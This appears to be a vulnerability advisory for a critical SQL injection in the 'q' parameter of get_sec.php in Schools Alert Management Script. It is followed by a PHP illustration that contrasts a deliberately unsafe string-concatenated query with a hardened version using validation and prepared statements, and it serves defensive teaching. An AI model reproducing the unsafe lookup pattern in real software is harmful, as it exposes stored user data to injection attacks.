Vendor: Schools Alert Management System
By: M3@Pandas
CVSS: 9.8 (CRITICAL)
CWE: 89 (SQL Injection)
Product Name: Schools Alert Management System
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CVE: CVE-2018-12052
CPE: a:phpscriptsmall:schools_alert_management_system
Metasploit: N/A
Other Scripts:
https://www.infosecmatter.com/nessus-plugin-library/?id=12052
https://www.infosecmatter.com/nessus-plugin-library/?id=12205
https://www.infosecmatter.com/nessus-plugin-library/?id=12065
https://www.infosecmatter.com/nessus-plugin-library/?id=15963
https://www.infosecmatter.com/nessus-plugin-library/?id=15970
https://www.infosecmatter.com/nessus-plugin-library/?id=15456
https://www.infosecmatter.com/nessus-plugin-library/?id=15572
https://www.infosecmatter.com/nessus-plugin-library/?id=12209
https://www.infosecmatter.com/nessus-plugin-library/?id=12054
https://www.infosecmatter.com/nessus-plugin-library/?id=12055
Platforms Tested: Linux Mint
Year: 2018
Schools Alert Management Script – ‘get_sec.php’ SQL Injection
An SQL injection vulnerability exists in Schools Alert Management Script that allows an attacker to execute arbitrary SQL commands through the 'get_sec.php' script. The flaw is due to insufficient sanitization of user-supplied input passed in the 'q' parameter. An attacker who exploits it can gain access to sensitive information such as usernames, passwords, and other data stored in the database.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
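The following is an added illustration of the mitigation above; it is not code from Schools Alert Management Script or from the advisory author. It shows a lookup handler in the shape of get_sec.php?q=... (the 'q' parameter is taken from the advisory), first in the unsafe string-concatenation form that produces this class of bug, then in a hardened form that applies the allow-list validation the advisory recommends and, in addition, binds the value as a prepared-statement parameter so the database never parses it as SQL. The table name `sections`, the column names, the validation pattern, and the use of PDO with an in-memory SQLite database (so the script runs stand-alone) are all assumptions for the example; the same PDO calls work against MySQL.

```php
<?php
// Added example, not the product's own code. Table/column names are assumed.

// Constructed in-memory database so the example runs without the product.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE sections (id INTEGER PRIMARY KEY, name TEXT NOT NULL)");
$pdo->exec("INSERT INTO sections (name) VALUES ('Grade 1'), ('Grade 2'), ('Grade 3')");

// UNSAFE pattern (the class of flaw the advisory describes): the request
// parameter is concatenated straight into the SQL text, so a quote character
// inside `q` ends the string literal and the rest of `q` becomes SQL.
function lookupUnsafe(PDO $pdo, string $q): array
{
    $sql = "SELECT id, name FROM sections WHERE name = '" . $q . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED version: reject anything outside a narrow allow-list (the
// validation step the advisory calls for), then pass the value as a bound
// parameter. With a bound parameter the database receives the query text and
// the data separately, so quotes or comment sequences in `q` stay data.
function lookupSafe(PDO $pdo, string $q): array
{
    // Assumed rule for this example: section names are short, alphanumeric plus spaces.
    if ($q === '' || strlen($q) > 50 || !preg_match('/^[A-Za-z0-9 ]+$/', $q)) {
        return []; // reject rather than try to "clean" the input
    }
    $stmt = $pdo->prepare("SELECT id, name FROM sections WHERE name = :q");
    $stmt->execute([':q' => $q]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Read the parameter as get_sec.php would; fall back to a fixed value so the
// script also runs from the command line for testing.
$q = $_GET['q'] ?? 'Grade 2';

header('Content-Type: application/json');
echo json_encode(['unsafe' => lookupUnsafe($pdo, $q), 'safe' => lookupSafe($pdo, $q)]), "\n";
```

For a well-formed name both functions return the same row, which is the point: the hardened version costs nothing in normal use, and only the unsafe one changes behaviour when the parameter carries SQL syntax. When reviewing a fix for this advisory, check that every query built from request data uses `prepare`/`execute` (or an equivalent parameterised API) rather than relying on validation alone, since validation rules drift as features are added while a bound parameter cannot be reinterpreted as SQL.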